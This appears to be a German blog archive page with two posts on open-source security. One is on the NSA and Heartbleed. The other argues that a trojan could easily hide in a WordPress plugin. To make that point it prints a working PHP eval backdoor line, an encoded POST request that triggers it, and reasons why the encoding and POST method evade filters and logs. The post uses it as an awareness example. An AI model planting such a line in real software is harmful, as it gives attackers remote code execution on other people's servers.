Archiv für die Kategorie » Open Source «

NSA: Wir schauen nicht in Open Source rein, wirklich nicht! Würde ein Geheimdienst lügen?

Sonntag, 13. April 2014, 14:45 Uhr | Autor:

NSA will nichts von “Heartbleed”-Lücke gewusst haben” (heise.de)

Die US-Regierung hat einen Medienbericht dementiert, wonach der Geheimdienst NSA die jüngst öffentlich gewordene massive Sicherheitslücke im Internet seit langem gekannt und ausgenutzt habe.

Verschlüsselung funktioniert weiterhin, sofern sie richtig implementiert ist. Ein Geheimdienst wie die NSA hat damit natürlich Probleme. OpenSSL ist weit verbreitet und Open Source, also bietet es sich an, darin nach Sicherheitslücken zu suchen. Die NSA ist wahrscheinlich eine der wenigen Stellen die sich offenen Quellcode eingehend ansieht. Vielleicht nicht von jedem Plugin für irgendein CMS, aber die Software die für die Informationsgewinnung relevant ist ist auf deren Liste. Es ist naiv zu glauben, die NSA würde solch eine offensichtliche Möglichkeit nicht nutzen. Das Dementi kam auch recht schnell. Bei einer Behörde mit mehreren zehntausend Mitarbeitern und x Abteilung, würde eine echte interne Recherche wohl etwas mehr als drei Tage dauern.


Dass die NSA auch verschlüsselte Daten speichern, um diese später zu entschlüsseln, ist kein Geheimnis.

Keys auslesen ist einfacher als gedacht” (golem.de)

Zwei Personen ist es gelungen, private Schlüssel mit Hilfe des Heartbleed-Bugs aus einem Nginx-Testserver auszulesen. Der Server gehört der Firma Cloudflare, die mit einem Wettbewerb sicherstellen wollte, dass das Auslesen privater Schlüssel unmöglich ist.



Ein Geheimdienst würde sich niemals vorsätzlich der Möglichkeit berauben eine Verschlüsselung aufzubrechen, zumal wenn man ihn für den Bug nicht verantwortlich machen kann. Es gibt zwar sehr dumme Verschwörungstheoretiker die eine Hexenjagd auf den deutschen Programmierer veranstalten, aber einen echten Zusammenhang zwischen ihm und der NSA ist nicht herstellbar. Bei dem Zufallszahlengenerator, der Backdoor darin und RSA, sah dies etwas anders aus: “Mehr Details zur Hintertür im Zufallszahlengenerator Dual EC DRBG” (heise.de)

Das die NSA viele Mio. Menschen vorsätzlich dem Treiben von Kriminellen ausgeliefert hat, ist im höchsten Maße verwerflich und müsste Konsequenzen haben. “müsste” weil mir klar ist, dass die Politik nicht den Mut dazu haben wird.

Thema: Open Source, Politik, Sicherheit | Beitrag kommentieren

Auf Schliemanns Spuren

Sonntag, 20. März 2011, 17:54 Uhr | Autor:

if (isset($_POST['t'])) eval(base64_decode(str_rot13($_POST['t'])));

In dem WordPress-Plugin welches ich hier für das Syntax-Highlighting benutze (WP-Syntax (wordpress.org)) stecken 192 php-Dateien, mit zusammen 55.009 Zeilen Code. Würde man darin die obige eine Zeile Code verstecken und via dem folgenden Request ansprechen

http://domain/pfad-zur/manipulierten-datei.php
[POST]
t=pTujnJ5zoltcBj==

so bekäme man die Server-Einstellungen zu dem installierten PHP angezeigt.

(POST-Request, damit es nicht in den Logfiles des Servers auftaucht und base64- und ROT13-kodiert, um mögliche Filter, die vor Angriffen schützen sollen, unbehelligt zu durchlaufen.)


Worauf ich hinaus will?

Bei Open Source haben wir zwar, im Gegensatz zu Closed Source, die Möglichkeit in die Quellen reinzuschauen, aber machen wir dies auch? Also, ich habe mir die 55.009 Zeilen Code in den 192 Dateien des einen Plugins nicht gründlich genug angeschaut, um 100% ausschließen zu können, dass darin ein Trojaner versteckt ist. ;O)

Wer es darauf anlegt Schadcode unters Volk zu bringen, der hat relativ leichtes Spiel. Nur zu bereitwillig werden Templates oder Plugins in einem CMS ungeprüft installiert.

Nur das Ausprobieren eines Plugins oder Templates könnte ein CMS mit einem Trojaner infizieren, indem beim einmaligen Aufruf eine Datei die zu dem System gehört um entsprechenden Code erweitert wird. Auch wenn das Plugin oder Template wieder gelöscht wird — der Schadcode ist im System.

Bekannte und weit verbreitete Projekte sind zwar grundsätzlich vor solchen Angriffen nicht gefeit, aber um so mehr Benutzer es gibt, und somit Leute die auch in den Code hineinschauen, um so eher besteht die Chance dass eine Manipulation auffliegt. Auch in solchen Projekten kann ein Angreifer zum Erfolg kommen, wenn beispielsweise ein Teammitglied vorsätzlich Sicherheitslücken einbaut. Wird seine “Sicherheitslücke” bekannt, so kann er sich damit herausreden dass er einfach nur schludrig gearbeitet hat.

Eine echte Lösung des Problems gibt es nicht. Man kann nur darauf achten die Quellen für Downloads mit Bedacht auszuwählen, was leider… “SourceForge schaltet Server nach Einbruch ab” (heise.de)


Update: 21.03.2011 – 17:05 Uhr

Wiki-Server der PHP-Entwickler gehackt” (heise.de)

Thema: Open Source, Sicherheit | 2 Kommentare